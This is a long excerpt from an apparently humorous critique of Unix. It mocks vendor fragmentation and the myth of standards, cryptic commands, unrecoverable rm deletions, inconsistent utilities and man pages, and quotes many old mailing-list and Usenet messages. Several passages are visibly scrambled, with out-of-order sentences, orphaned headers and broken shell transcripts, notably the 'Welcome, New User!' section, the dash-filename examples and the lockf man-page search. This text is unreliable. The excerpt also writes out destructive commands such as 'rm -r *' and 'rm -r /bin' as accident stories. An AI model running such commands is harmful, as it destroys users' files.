Perhaps the most startling fact about RIP is that it was built and widely distributed with no formal standard. Most implementations have been derived from the Berkeley code, with interoperability limited by the programmer's understanding of undocumented details and subtleties. As new versions appear, more problems arise.

Like a classics radio station whose play list spans decades, Unix simultaneously exhibits its mixed and dated heritage. There's Clash-era graphics interfaces; Beatles-era two-letter command names; Bing Crosby-era command editing (# and @ are still the default line editing commands); systems programs (for example, ps) whose terse and obscure output was designed for slow teletypes; and Scott Joplin-era core dumps.

Others have noticed that Unix is evolutionarily superior to its competition, rather than technically superior. Richard P. Gabriel, in his essay "The Rise of Worse-is-Better," expounds on this theme (see Appendix A). His thesis is that the Unix design philosophy requires that all design decisions err on the side of implementation simplicity, and not on the side of correctness, consistency, or completeness. He calls this the "Worse Is Better" philosophy and shows how it yields programs that are technically inferior to programs designed where correctness and consistency are paramount, but that are evolutionarily superior because they port more easily. Just like a virus. There's nothing elegant about viruses, but they are very successful. You will probably die from one. A comforting thought.

Sex, Drugs, and Unix

While Unix spread like a virus, its adoption by so many can only be described by another metaphor: that of a designer drug.

AT&T gave away free samples of Unix to university types during the 1970s. Researchers and students got a better high from Unix than any other OS. It was cheap, it was malleable, it ran on relatively inexpensive hardware. And it was superior, for their needs, to anything else they could obtain. Better operating systems that would soon be competing with Unix either required hardware that universities couldn't afford, weren't "free," or weren't yet out of the labs that were busily synthesizing them. Like any good drug dealer, AT&T's policy produced, at no cost, scads of freshly minted Unix hackers that were psychologically, if not chemically, dependent on Unix.
When the Motorola 68000 microprocessor appeared, dozens of workstation companies sprouted. Very few had significant O/S expertise. Virtually all of them used Unix: these programmers were capable of jury-rigging (sometimes called "porting") Unix onto different platforms. High-quality OSs required too much computing power to support. So the economical, not technical, choice was Unix.

Sun Microsystems became the success it is today because it produced the cheapest workstations, not because they were the best or provided the best price/performance. For these workstation manufacturers, the economic choice was Unix: Unix was written into Sun's business plan, accomplished Unix hackers were among the founders, Unix was chosen because it was portable, and because Unix hackers that had no other way to get their fixes were readily and cheaply available. And customers got what they paid for. By 1984, according to DEC's own figures, one quarter of the VAX installations in the United States were running Unix, even though DEC wouldn't support it.

Users said that they wanted Unix because it was better than the "stone knives and bear skins" FORTRAN and Cobol development environments that they had been using for three decades. But in choosing Unix, they unknowingly ignored years of research on operating systems that would have done a far better job of solving their problems. It didn't really matter, they thought: Unix was better than what they had. They were willing to make a few sacrifices.

Did users want the operating system where bugs didn't get fixed? Not likely. Did users want the operating system with a terrible tool set? Probably not. Did users really want the OS with a terrible and dangerous user interface? No way. Did users want the OS without automatic command completion? No. Did users want the only OS without intelligent typeahead? Indeed not. Did users want the OS without memory mapped files? No. Did users want the OS that couldn't stay up more than a few days (sometimes hours) at a time? Nope. Did users want the cheapest workstation money could buy that supported a compiler and linker? Absolutely.

Standardizing Unconformity

"The wonderful thing about standards is that there are so many of them to choose from."
—Grace Murray Hopper
Ever since Unix got popular in the 1980s, there has been an ongoing effort on the part of the Unix vendors to "standardize" the operating system. Although it often seems that this effort plays itself out in press releases and not on programmers' screens, Unix giants like Sun, IBM, HP, and DEC have in fact thrown millions of dollars at the problem—a problem largely of their own making.

Why Unix Vendors Really Don't Want a Standard Unix

The push for a unified Unix has come largely from customers who see the plethora of Unixes, find it all too complicated, and end up buying a PC clone and running Microsoft Windows. One of the reasons that these customers turn to Unix is the promise of "open systems" that they can use to replace their proprietary mainframes and minis. Sure, customers would rather buy a similarly priced workstation and run a "real" operating system (which they have been deluded into believing means Unix), but there is always the risk that the critical applications the customer needs won't be supported on the particular flavor of Unix that the customer has purchased.

The second reason that customers want compatible versions of Unix is that they mistakenly believe that software compatibility will force hardware vendors to compete on price and performance: if every Sun, IBM, HP, and DEC workstation runs the same software, vendors can no longer lock customers in, eventually resulting in lower workstation prices.

Of course, both of these reasons are the very same reasons that workstation companies like Sun, IBM, HP, and DEC really don't want a unified version of Unix. It's hard to resist being tough on the vendors. After all, in one breath they say that they want to offer users and developers a common Unix environment. In the next breath, they say that they want to make their own trademarked version of Unix just a little bit better than their competitors: add a few more features, improve functionality, provide better administrative tools, and you can jack up the price. Anybody who thinks that the truth lies somewhere in between is having the wool pulled over their eyes. Yet, in the final analysis, switching to Unix has simply meant moving to a new proprietary system—a system that happens to be a proprietary version of Unix. It's all kind of ironic.

Date: Wed, 20 Nov 91 09:37:23 PST
From: simsong@nextworld.com
To: UNIX-HATERS
Subject: Unix names

Perhaps keeping track of the different names for various versions of Unix is not a problem for most people, but today the copy editor here at NeXTWORLD asked me what the difference was between AIX and A/UX.

"AIX is Unix from IBM. A/UX is Unix from Apple."

"What's the difference?" he asked.

"I'm not sure. They're both AT&T System V with gratuitous changes. Then there's HP-UX which is HP's version of System V with gratuitous changes. DGUX is Data General's. And don't forget Xenix—that's from SCO. I think that's right."

NeXT, meanwhile, calls their version of Unix (which is really Mach with brain-dead Unix wrapped around it) NEXTSTEP. But it's impossible to get a definition of NEXTSTEP: is it the window system? Objective-C? The environment? Mach? What?

Originally, many vendors wanted to use the word "Unix" to describe their products, but they were prevented from doing so by AT&T's lawyers, who thought that the word "Unix" was some kind of valuable registered trademark. Vendors picked names like VENIX and ULTRIX to avoid the possibility of a lawsuit. (DEC calls its system ULTRIX.) These days, most vendors wouldn't use the U-word if they had a choice. It isn't that they're trying to avoid a lawsuit: what they are really trying to do is draw a distinction between their new and improved Unix and all of the other versions of Unix that merely satisfy the industry standards.

Date: Sun, 13 May 90 16:06 EDT
From: John R. Dunning <jrd@stony-brook.scrc.symbolics.com>
To: UNIX-HATERS
Subject: Unix: the last word in incompatibility.

Date: Tue, 8 May 90 14:57:43 EDT
From: Noel Chiappa <jnc@allspice.lcs.mit.edu>

[...] I think Unix and snowflakes are the only two classes of objects in the universe in which no two instances ever match exactly. [...]

And it reminded me of another story. Some years ago, when I was being a consultant for a living, I had a job at a software outfit that was building a large graphical user-interface sort of application. They were using some kind of Unix on a PDP-11 for development and planning to sell it with a board to OEMs. I had the job of evaluating various Unix variants, running on various multibus-like hardware, to see what would best meet their needs. The evaluation process consisted largely of trying to get their test program, which was an early prototype of the product, to compile and run on the various *nixes. Piece of cake, sez I.

Well. I don't remember the details of which variants had which problems, but the result was that no two of the five that I tried were compatible for anything more than trivial programs! I was shocked. I was appalled. I was impressed that a family of operating systems that claimed to be compatible would exhibit this class of lossage. Well, what do you know: a few #ifdefs here, a few fake library interface functions there. But oops: Venix's pseudo real-time facilities don't work at all. And gee, look at that: a bug in the Xenix compiler prevents you from using byte-sized frobs here; you have to fake it out with structs and unions and things. And oh yeah, one vendor changed all the argument order around on this class of system functions. Ad nauseam. But the thing that really got me was that none of this was surprising to the other *nix hackers there! Their attitude was something to the effect of "Well, life's like that, what's the big deal?"

I don't know if there's a moral to this story, other than one should never trust anything related to Unix to be compatible with any other thing related to Unix. I heard some time later that the software outfit in question ran two years over their original schedule, finally threw Unix out completely, and deployed on MS-DOS machines. The claim was that doing so was the only thing that let them get the stuff out the door at all!

In a 1989 posting to the Peter Neumann's RISKS mailing list, Pete Schilling, an engineer in Alcoa Laboratories' Applied Mathematics and Computer Technology Division, criticized the entire notion of the word "standard" being applied to software systems such as Unix. Real standards, wrote Schilling, are for physical objects like steel beams: they let designers order a part and incorporate it into their design with foreknowledge of how it will perform under real-world conditions. "If a beam fails in service," then the builder's lawyers call the beam maker's lawyers to discuss things like compensatory and punitive damages. The threat of liability keeps most companies honest; those who aren't honest presumably get shut down soon enough.

This notion of standards breaks down when applied to software systems. What sort of specification does a version of Unix satisfy? POSIX? X/Open? CORBA? There is so much wiggle room in these standards as to make the idea that a company might have liability for not following them ludicrous to ponder. Apparently, everybody follows these self-designed standards, yet none of the products are compatible.

Indeed, Sun Microsystems recently announced that it was joining with NeXT to promulgate OpenStep, a new standard for object-oriented user interfaces. To achieve this openness, Sun would wrap C++ and DOE around Objective-C and NEXTSTEP. Can't decide which standard you want to follow? No problem: now you can follow them all.

Unix Myths

Drug users lie to themselves. "Pot won't make me stupid." "I'm just going to try crack once." "I can stop anytime that I want to." If you are in the market for drugs, you'll hear these lies. Unix has its own collection of myths, as well as a network of dealers pushing them. Perhaps you've seen them before:

1. It's standard.
2. It's fast and efficient.
3. It's the right OS for all purposes.
4. It's small, simple, and elegant.
5. Shell scripts and pipelines are a great way to structure complex problems and systems.
6. It's documented online.
7. It's documented.
8. It's written in a high-level language.
9. X and Motif make Unix as user-friendly and simple as the Macintosh.
10. Processes are cheap.
11. It invented:
• the hierarchical file system
• electronic mail
• networking and the Internet protocols
• remote file access
• security/passwords/file protection
• finger
• uniform treatment of I/O devices
12. It has a productive programming environment.
13. It's a modern operating system.
14. It's what people are asking for.
15. The source code:
• is available
• is understandable
• you buy from your manufacturer actually matches what you are running

You'll find most of these myths discussed and debunked in the pages that follow.
not only were human factors engineers never invited to work on the structure. so much so that they don’t mind sleeping on the floor in rooms with no smoke detectors. Nonetheless builders still marvel at its design. With the explosion of cheap workstations. Unix has entered a new era. No amount of training on DOS or the Mac prepares one for the majestic beauty of cryptic two-letter command names such as cp. it hosted no guests. . We don’t envy these companies their task. central heating. the keyboard of the ASR-33 Teletype. Unlike today’s keyboards.18 Welcome. reliability. are now extremely hard and expensive to retrofit into the structure. New User! When Unix was under construction. Those of us who used early 70s I/O devices suspect the degeneracy stems from the speed. Cryptic Command Names The novice Unix user is always surprised by Unix’s choice of command names. and. that of the delivery platform. and the only force necessary is that needed to close a microswitch. Thus. This change is easy to date: it’s when workstation vendors unbundled their C compilers from their standard software suite to lower prices for nondevelopers. rather than programmers. and ls. and windows that open. most importantly. and take the force necessary to run a small electric generator such as those found on bicycles. their need was never anticipated or planned. rm. Thus. keys on the Teletype (at least in memory) needed to travel over half an inch. the common input/output device in those days. You could break your knuckles touch typing on those beasts. Every visitor was a contractor who was given a hard hat and pointed at some unfinished part of the barracks. The fossil record is a little unclear on the boundaries of this change. like flush toilets. Unix was the research vehicle for university and industrial researchers. Unfortunately. For most of its history. but it mostly occurred in 1990. where the distance keys travel is based on feedback principles. 
This explains why companies are now trying to write graphical user interfaces to “replace” the need for the shell. it’s only during the past few years that vendors have actually cared about the needs and desires of end users. many standard amenities.
If Dennis and Ken had a Selectric instead of a Teletype, we'd probably be typing "copy" and "remove" instead of "cp" and "rm."1 Proof again that technology limits our choices as often as it expands them.

After more than two decades, what is the excuse for continuing this tradition? The implacable force of history, AKA existing code and books. If a vendor replaced rm by, say, "remove," then every book describing Unix would no longer apply to its system, and every shell script that calls rm would also no longer apply. Such a vendor might as well stop implementing the POSIX standard while it was at it.

A century ago, fast typists were jamming their keyboards, so engineers designed the QWERTY keyboard to slow them down. Computer keyboards don't jam, but we're still living with QWERTY today. A century from now, the world will still be living with rm.

Accidents Will Happen

Users care deeply about their files and data. They use computers to generate, analyze, and store important information. They trust the computer to safeguard their valuable belongings. Without this trust, the relationship becomes strained. Unix abuses our trust by steadfastly refusing to protect its clients from dangerous commands. In particular, there is rm, that most dangerous of commands, whose raison d'etre is deleting files.

All Unix novices have "accidentally" and irretrievably deleted important files. Even experts and sysadmins "accidentally" delete files. The bill for lost time, lost effort, and file restoration probably runs in the millions of dollars annually. This should be a problem worth solving; we don't understand why the Unixcenti are in denial on this point. Does misery love company that much?

Files die and require reincarnation more often under Unix than under any other operating system. Here's why:

1. The Unix file system lacks version numbers.

1 Ken Thompson was once asked by a reporter what he would have changed about Unix if he had it all to do over again. His answer: "I would spell creat with an 'e.'"
20 Welcome, New User!

Automatic file versioning, which gives new versions of files new names or numbered extensions, would preserve previous versions of files. This would prevent new versions of files from overwriting old versions. Overwriting happens all the time in Unix.

2. Unix programmers have a criminally lax attitude toward error reporting and checking.

Many programs don't bother to see if all of the bytes in their output file can be written to disk. Some don't even bother to see if their output file has been created. Nevertheless, these programs are sure to delete their input files when they are finished.

3. The Unix shell, not its clients, expands "*".

Having the shell expand "*" prevents the client program, such as rm, from doing a sanity check to prevent murder and mayhem. Even DOS verifies potentially dangerous commands such as "del *.*". Under Unix, however, the file deletion program cannot determine whether the user typed:

% rm *

or:

% rm file1 file2 file3 ...

This situation could be alleviated somewhat if the original command line was somehow saved and passed on to the invoked client command. Perhaps it could be stuffed into one of those handy environment variables.

4. File deletion is forever.

Unix has no "undelete" command. With other, safer operating systems, deleting a file marks the blocks used by that file as "available for use" and moves the directory entry for that file into a special directory of "deleted files." If the disk fills up, the space taken by deleted files is reclaimed.

Most operating systems use the two-step, delete-and-purge idea to return the disk blocks used by files to the operating system. This isn't rocket science; even the Macintosh, back in 1984, separated "throwing things into the trash" from "emptying the trash." Tenex had it back in 1974.
DOS and Windows give you something more like a sewage line with a trap than a wastebasket, but if you want to stick your hand in to get it back, at least there are utilities you can buy to do the job.

These four problems operate synergistically, causing needless but predictable and daily file deletion. Better techniques were understood and in widespread use before Unix came along. They're being lost now with the acceptance of Unix as the world's "standard" operating system.

Welcome to the future.

"rm" Is Forever

The principles above combine into real-life horror stories. A series of exchanges on the Usenet news group alt.folklore.computers illustrates our case:

Date: Wed, 10 Jan 90
From: djones@megatest.uucp (Dave Jones)
Subject: rm *
Newsgroups: alt.folklore.computers2

Anybody else ever intend to type:

% rm *.o

And type this by accident:

% rm *>o

Now you've got one new empty file called "o", but plenty of room for it!

Actually, you might not even get a file named "o", since the shell documentation doesn't specify if the output file "o" gets created before or after the wildcard expansion takes place. The shell may be a programming language, but it isn't a very precise one. They work—some of the time.

2 Forwarded to UNIX-HATERS by Chris Garrigues.
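An aside worth a sketch here, though it is not something the text itself proposes: the overwrite half of such accidents (the ">" in "rm *>o") can be partially blunted by the shell's noclobber option, spelled "set -C" in POSIX shells. It does nothing at all for rm itself.

```shell
# Demonstration of the shell's "noclobber" protection against accidental
# overwrite-by-redirection (csh: set noclobber; POSIX sh/bash: set -C).
# It only guards the ">" half of an accident like "rm *>o" -- rm still
# deletes whatever the shell hands it.
cd "$(mktemp -d)"
set -C                           # enable noclobber
echo precious > o                # creating a brand-new file is still fine
( echo junk > o ) 2>/dev/null \
  || echo "redirection refused"  # clobbering an existing file is refused
cat o                            # the original contents survive
```

csh has long had noclobber; a message later in this chapter wishes it had a companion "nohistclobber" as well.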
Date: Wed, 10 Jan 90 15:51 CST
From: ram@attcan.uucp
Subject: Re: rm *
Newsgroups: alt.folklore.computers

I too have had a similar disaster using rm. Once I was removing a file system from my disk which was something like /usr/foo/bin. I was in /usr/foo and had removed several parts of the system by:

% rm -r ./etc
% rm -r ./adm

…and so on. But when it came time to do ./bin, I missed the period. System didn't like that too much.

Unix wasn't designed to live after the mortal blow of losing its /bin directory. An intelligent operating system would have given the user a chance to recover (or at least confirm whether he really wanted to render the operating system inoperable).

Unix aficionados accept occasional file deletion as normal. For example, consider the following excerpt from the comp.unix.questions FAQ:3

6) How do I "undelete" a file?

Someday, you are going to accidentally type something like:

% rm * .foo

and find you just deleted "*" instead of "*.foo". Consider it a rite of passage.

Of course, any decent systems administrator should be doing regular backups. Check with your sysadmin to see if a recent backup copy of your file is available.

"A rite of passage"? In no other industry could a manufacturer take such a cavalier attitude toward a faulty product. "But your honor, the exploding gas tank was just a rite of passage." "Ladies and gentlemen of the jury, we will prove that the damage caused by the failure of the safety catch on our…

3 comp.unix.questions is an international bulletin-board where users new to the Unix Gulag ask questions of others who have been there so long that they don't know of any other world. The FAQ is a list of Frequently Asked Questions garnered from the reports of the multitudes shooting themselves in the feet.
"May it please the court, we will show that getting bilked of their life savings by Mr. Keating was just a rite of passage for those retirees."

Changing rm's Behavior Is Not an Option

After being bitten by rm a few times, the impulse rises to alias the rm command so that it does an "rm -i" or, better yet, to replace the rm command with a program that moves the files to be deleted to a special hidden directory, such as ~/.deleted. These tricks lull innocent users into a false sense of security.

Date: Mon, 16 Apr 90 18:46:33 199
From: Phil Agre <agre@gargoyle.uchicago.edu>
To: UNIX-HATERS
Subject: deletion

On our system, "rm" doesn't delete the file, rather it renames in some obscure way the file so that something called "undelete" (not "unrm") can get it back. This has made me somewhat incautious about deleting files, since of course I can always undelete them. Well, no I can't. The Delete File command in Emacs doesn't work this way, nor does the D command in Dired. This, of course, is because the undeletion protocol is not part of the operating system's model of files but simply part of a kludge someone put in a shell command that happens to be called "rm."

As a result, I have to keep two separate concepts in my head, "deleting" a file and "rm"ing it, and remind myself of which of the two of them I am actually performing when my head says to my hands "delete it."

Some Unix experts follow Phil's argument to its logical absurdity and maintain that it is better not to make commands like rm even a slight bit friendly. They argue, though not quite in the terms we use, that trying to make Unix friendlier, to give it basic amenities, will actually make it worse. Unfortunately, they are right.
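The move-to-a-hidden-directory replacement described above takes only a few lines of shell. The sketch below is our illustration, not a recommendation: the directory name ~/.deleted is borrowed from Phil Agre's message, the function names "del" and "undel" are made up, and a real version would also need collision handling and a disk-space reclamation policy.

```shell
# A sketch of the "move files to a hidden directory" rm replacement
# described in the text. Names are illustrative; a production version
# needs collision handling and a purge policy for ~/.deleted.
del() {
    mkdir -p "$HOME/.deleted" || return 1
    mv -- "$@" "$HOME/.deleted/"
}

# "undelete" is then just a mv in the other direction:
undel() {
    mv -- "$HOME/.deleted/$1" .
}
```

Giving the wrapper its own name, rather than aliasing rm itself, avoids breaking scripts that depend on rm's real behavior.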
Date: Thu, 11 Jan 90 17:17 CST
From: merlyn@iwarp.intel.com (Randal L. Schwartz)
Subject: Don't overload commands! (was Re: rm *)
Newsgroups: alt.folklore.computers

We interrupt this newsgroup to bring you the following message…

#ifdef SOAPBOX_MODE

Please, please, please do not encourage people to overload standard commands with "safe" commands.

(1) People usually put it into their .cshrc in the wrong place, so that scripts that want to "rm" a file mysteriously ask for confirmation, and/or fill up the disk thinking they had really removed the file.

(2) There's no way to protect from all things that can accidentally remove files, and if you protect one common one, users can and will get the assumption that "anything is undoable" (definitely not true!).

(3) If a user asks a sysadm (my current hat that I'm wearing) to assist them at their terminal, commands don't operate normally, which is frustrating as h*ll when you've got this user to help and four other tasks in your "urgent: needs attention NOW" queue.

If you want an "rm" that asks you for confirmation, do an:

% alias del rm -i

AND DON'T USE RM! Sheesh. How tough can that be, people!?!

#endif

We now return you to your regularly scheduled "I've been hacking so long we had only zeros, not ones and zeros" discussion…

Just another system hacker.

Recently, a request went out to comp.unix.questions asking sysadmins for their favorite administrator horror stories. Within 72 hours, 300 messages were posted. Most of them regarded losing files using methods described in this chapter. Funny thing is, these are experienced Unix users who should know better. Even stranger, even though millions of dollars of destruction
was reported in those messages, most of those very same sysadmins came to Unix's defense when it was attacked as not being "user-friendly."

Not user friendly? Unix isn't even "sysadmin friendly"! For example:

Date: Wed, 14 Sep 88 01:39 EDT
From: Matthew P Wiener <weemba@garnet.berkeley.edu>
To: RISKS-LIST@kl.sri.com4
Subject: Re: "Single keystroke"

On Unix, even experienced users can do a lot of damage with "rm." I had never bothered writing a safe rm script since I did not remove files by mistake. Then one day I had the bad luck of typing "!r" to repeat some command or other from the history list, and to my horror saw the screen echo "rm -r *" I had run in some other directory. Luckily, having taken time to clean things up, a file low in alphabetic order did not have write permission, so the removal of everything stopped early.

Coincidentally, just the other day I listened to a naive user's horror at running "rm *" to remove the file "*" he had just incorrectly created from within mail. Maybe the C shell could use a nohistclobber option? This remains the only time I have ever rm'ed or overwritten any files by mistake and it was a pure and simple gotcha! of the lowest kind.

The author of this message suggests further hacking the shell (by adding a "nohistclobber option") to make up for the underlying failing of the operating system's expansion of star-names. Unfortunately, this "fix" is about as effective as repairing a water-damaged wall with a new coat of paint.

4 Forwarded to UNIX-HATERS by Michael Travers.

Consistently Inconsistent

Predictable commands share option names, take arguments in roughly the same order, and, where possible, produce similar output. Consistency requires a concentrated effort on the part of some central body that promulgates standards. Applications on the Macintosh are consistent because they follow a guidebook published by Apple. No such body has ever existed for
Unix utilities. As a result, some utilities take their options preceded by a dash, some don't. Some read standard input, some don't. Some write standard output, some don't. Some create files world writable, some don't. Some report errors, some don't. Some put a space between an option and a filename, some don't.

Unix was an experiment to build an operating system as clean and simple as possible. As an experiment, it worked, but as a production system the researchers at AT&T overshot their goal. In order to be usable by a wide number of people, an operating system must be rich. If the system does not provide that fundamental richness itself, users will graft functionality onto the underlying framework. The real problem of consistency and predictability, suggests Dave Mankins, may be that Unix provided programmers outside AT&T with no intellectual framework for making these additions.

Date: Sat, 04 Mar 89 19:25:58 EST
From: dm@think.com
To: UNIX-HATERS
Subject: Unix weenies at their own game

Unix weenies like to boast about the conceptual simplicity of each command. What most people might think of as a subroutine, Unix weenies wrap up as a whole command, with its own argument syntax and options.

This isn't such a bad idea, since, in the absence of any other interpreters, one can write pretty powerful programs by linking together these little subroutines. Too bad it never occurred to anyone to make these commands into real subroutines, so you could link them into your own program, instead of having to write your own regular expression parser (which is why ed, sed, grep, and the shells all have similar, but slightly different understandings of what a regular expression is).5

The highest achievement of the Unix-aesthetic is to have a command that does precisely one function, and does it well. Purists object that, after freshman programmers at Berkeley got through with it, the program "cat" which concatenates multiple files to its output6 now has OPTIONS. ("Cat came back from Berkeley waving flags," in the words of Rob Pike, perhaps the ultimate Unix minimalist.)

This philosophy, in the hands of amateurs, leads to inexplicably mind-numbing botches like the existence of two programs, "head" and "tail," which print the first part or the last part of a file. Even though their operations are duals of one another, "head" and "tail" are different programs, written by different authors, and take different options!

If only the laws of thermodynamics were operating here, then Unix would have the same lack of consistency and entropy as other systems that were accreted over time, and be no better or worse than them. However, architectural flaws increase the chaos and surprise factor. By convention, programs accept their options as their first argument, usually preceded by a dash (-). Options (switches) and other arguments should be separate entities, as they are on VMS, DOS, Genera, and many other operating systems. This is flaw #1. We mentioned that the shell performs wildcard expansion, that is, it replaces the star (*) with a listing of all the files in a directory. This is flaw #2. The shell acts as an intermediary that sanitizes and synthesizes a command line for a program from the user's typing. Unfortunately, the shell acts more like Inspector Clouseau than Florence Nightingale: programs are not allowed to see the command line that invoked them, lest they spontaneously combust. Finally, Unix filenames can contain most characters, including nonprinting ones. This is flaw #3.

These architectural choices interact badly. The shell lists files alphabetically when expanding "*", and the dash (-) comes first in the lexicographic caste system. Therefore, filenames that begin with a dash (-) appear first when "*" is used. These filenames become options to the invoked program, yielding unpredictable, surprising, and dangerous behavior.

5 Well, actually, it did occur to someone. Unfortunately, that someone worked on a version of Unix that became an evolutionary dead-end.

6 Using "cat" to type files to your terminal is taking advantage of one of its side effects, not using the program for its "true purpose."

Date: Wed, 10 Jan 90 10:40 CST
From: kgg@lfcs.ed.ac.uk (Kees Goossens)
Subject: Re: rm *
Newsgroups: alt.folklore.computers
Then there’s the story of the poor student who happened to have a file called “-r” in his home directory. As he wanted to remove all his non directory files (I presume) he typed: % rm * … automatically. Then we could modify the ls command not to show it.
Impossible Filenames
We’ve known several people who have made a typo while renaming a file that resulted in a filename that began with a dash: % mv file1 -file2 Now just try to name it back: % mv -file2 file1 usage: mv [-if] f1 f2 or mv [-if] f1 ... fn d1 (‘fn’ is a file or directory) % The filename does not cause a problem with other Unix commands because there’s little consistency among Unix commands. For example, the filename “-file2” is kosher to Unix’s “standard text editor,” ed. This example works just fine: % ed -file2 4347
% rm -file2
usage: rm [-rif] file ...
% rm ?file2
usage: rm [-rif] file ...
% rm ??????
usage: rm [-rif] file ...
% rm *file2
usage: rm [-rif] file ...
%
rm interprets the file’s first character (the dash) as a command-line option; then it complains that the characters “l” and “e” are not valid options. Doesn’t it seem a little crazy that a filename beginning with a hypen, especially when that dash is the result of a wildcard match, is treated as an option list? Unix provides two independent and incompatible hack-arounds for eliminating simply Here’s a way to amuse and delight your friends (courtesy of Leigh Klotz). First, in great secret, do the following: % mkdir foo % touch foo/foo~ Then show your victim the results of these incantations: % ls foo* foo~ % rm foo~ rm: foo~ nonexistent % rm foo* rm: foo directory % ls foo* foo~ % Last, for a really good time, try this: % cat - - (Hint: press ctrl-D three times to get your prompt back!)
Online Documentation

Some Unix "commands" are really commands that live in a shell and therefore have no man pages of their own. A novice told to use "man command" to get the documentation on a command rapidly gets confused as she sees some commands documented, and others not. And if she's been set up with a shell different from the ones documented in third-party books, there's no hope of enlightenment without consulting a guru.
Error Messages and Error Checking, NOT!
To Delete Your File, Try the Compiler
Some versions of cc frequently bite undergraduates by deleting previous output files before checking for obvious input problems.

Date: Thu, 26 Nov 1992 16:01:55 GMT
From: tk@dcs.ed.ac.uk (Tommy Kelly)
Subject: HELP!
Newsgroups: cs.questions

From: Daniel Weise <daniel@dolores.stanford.edu>
To: UNIX-HATERS
Date: Thu, 1 July 1993 09:10:50 -0700
Subject: tarred and feathered

Date: Sun, 4 Oct 1992 00:21:49 PDT
From: Pavel Curtis <pavel@parc.xerox.com>
To: UNIX-HATERS
Subject: So many bastards to choose from…
I have this program, call it foo, that runs continuously on my machine, providing a network service and checkpointing its (massive) executable.

These attempts at humor work with the Bourne shell:

$ PATH=pretending! /usr/ucb/which sense
no sense in pretending!
$ drink <bottle; opener
bottle: cannot open
opener: not found
$ mkdir matter; cat >matter
matter: cannot create
The Unix Attitude
We’ve painted a rather bleak picture: cryptic command names, inconsistent and unpredictable behavior, no protection from dangerous commands, barely acceptable online documentation, and a lax approach to error checking and robustness. Those visiting the House of Unix are not in for a treat. They are visitors to a U.N. relief mission in the third world, not to Disneyland. How did Unix get this way? Part of the answer is historical, as we’ve indicated. But there’s another part to the answer: the culture of those constructing. Date: From: To: Subject: Sun, 24 Dec 89 19:01:36 EST David Chapman <zvona@ai..mit.edu> UNIX-HATERS messages to processes. For example, one message you can send to a process documented,> [1] - Stopped [2] - Stopped [3] + Stopped jobs latex latex latex
This readily lets you associate particular LaTeX jobs with job numbers.
3 Documentation? What Documentation?

"One of the advantages of using UNIX to teach an operating systems course is the sources and documentation will easily fit into a student's briefcase."
—John Lions, University of New South Wales, talking about Version 6, circa 1976

For years, there were three simple sources for detailed Unix knowledge:

1. Read the source code.
2. Write your own version.
3. Call up the program's author on the phone (or inquire over the network via e-mail).

Unix was like Homer, handed down as oral wisdom. There simply were no serious Unix users who were not also kernel hackers—or at least had kernel hackers in easy reach. What documentation was actually written—the infamous Unix "man pages"—was really nothing more than a collection of reminders for people who already knew what they were doing. The Unix documentation was so concise that you could read it all in an afternoon.
On-line Documentation

The Unix documentation system began as a single program called man. man was a tiny utility that took the argument that you provided, found the appropriate matching file, piped the file through nroff with the "man" macros (a set of text formatting macros used for nothing else on the planet), and finally sent the output through pg or more. Originally, these tidbits of documentation were called "man pages" because each program's entry was little more than a page (and frequently less).

man was great for its time. But that time has long passed.

Over the years, the man page system has slowly grown and matured. To its credit, it has not become a tangled mass of code and confusing programs like the rest of the operating system. On the other hand, it hasn't become significantly more useful either. Indeed, in more than 15 years, the Unix system for on-line documentation has only undergone two significant advances:

1. catman, in which programmers had the "breakthrough" realization that they could store the man pages as both nroff source files and as files that had already been processed, so that they would appear faster on the screen. With today's fast processors, a hack like catman isn't needed anymore. But all those nroff'ed files still take up megabytes of disk space.

2. makewhatis, apropos, and key (which was eventually incorporated into man -k), a system that built a permuted index of the man pages and made it possible to look up a man page without knowing the exact title of the program for which you were looking. (These utilities are actually shipped disabled with many versions of Unix shipping today, which makes them deliver a cryptic error when run by the naive user.)

Meanwhile, advances in electronic publishing have flown past the Unix man system. Today's hypertext systems let you jump from article to article in a large database at the click of a mouse button. Man pages, by contrast, merely print a section called "SEE ALSO" at the bottom of each page and invite the user to type "man something else" on the command line following the prompt. How about indexing on-line documentation? These days you can buy a CD-ROM edition of the Oxford English Dictionary that indexes every single word in the entire multivolume set. Man pages, on the other hand, are still indexed solely by the program's name and one-line description. Today even DOS now has an indexed, hypertext system for on-line documentation. Man pages, meanwhile, are still formatted for the 80-column, 66-line page of a DEC printing terminal.

To be fair, some vendors have been embarrassed into writing their own hypertext documentation systems. On those systems, man has become an evolutionary dead-end, often times with man pages that are out-of-date, or simply missing altogether.

"I Know It's Here … Somewhere."

For people trying to use man today, one of the biggest problems is telling the program where your man pages actually reside on your system. Back in the early days, finding documentation was easy: it was all in /usr/man. Then the man pages were split into directories by chapter: /usr/man/man1, /usr/man/man2, /usr/man/man3, and so on. Many sites even threw in /usr/man/manl for the "local" man pages.

Things got a little confused when AT&T slapped together System V. The directory /usr/man/man1 became /usr/man/c_man, as if a single letter somehow was easier to remember than a single digit. On some systems, /usr/man/manl was moved to /usr/local/man. Companies that were selling their own Unix applications started putting in their own "man" directories.

Eventually, Berkeley modified man so that the program would search for its man pages in a set of directories specified by an environment variable called MANPATH. It was a great idea with just one small problem: it didn't work.

Date: Wed, 9 Dec 92 13:17:01 -0500
From: Rainbow Without Eyes <michael@porsche.visix.com>
To: UNIX-HATERS
Subject: Man page, man page, who's got the man page?

For those of you willing to admit some familiarity with Unix, you know that there are some on-line manual pages in /usr/man, and that this is usually a good place to start looking for documentation about a given function. So when I tried looking for the lockf(3) pages, to find out exactly how non-portable lockf is, I tried this on a SGI Indigo yesterday:

michael: man lockf
there’s something wrong with finding only an X subdirectory in man3.. BSD ls-formatting difference. so I started looking in /usr/man.. But. and that my MANPATH already contained /usr/man (and every other directory in which I had found useful man pages on any system)./u_man . other than the SysV vs. This is despite the fact that I know that things can be elsewhere. looking for anything that looked like cat3 or man3: michael: cd michael: ls kermit.46 Documentation? Nothing showed up. I thought this was rather weird.3 -print michael: ../p_man/man3 Now. I expected to see something like: michael: cd /usr/man michael: ls man1 man2 man3 man4 man8 manl What I got was: michael: cd /usr/man michael: ls local p_man u_man (%*&@#+! SysV-ism) Now.1c michael: cd michael: ls man3 michael: cd man1 man4 michael: cd michael: ls Xm local man5 man6 man7 ./p_man . I kept on. What next? The brute-force method: michael: cd / michael: find / -name lockf.
Waitaminit. There's no lockf.3 man page on the system? Time to try going around the problem: send mail to a regular user of the machine. He replies that he doesn't know where the man page is, but he gets it when he types "man lockf." The elements of his MANPATH are less than helpful, as his MANPATH is a subset of mine.

michael: cd /usr/catman
michael: ls
a_man g_man local p_man u_man whatis

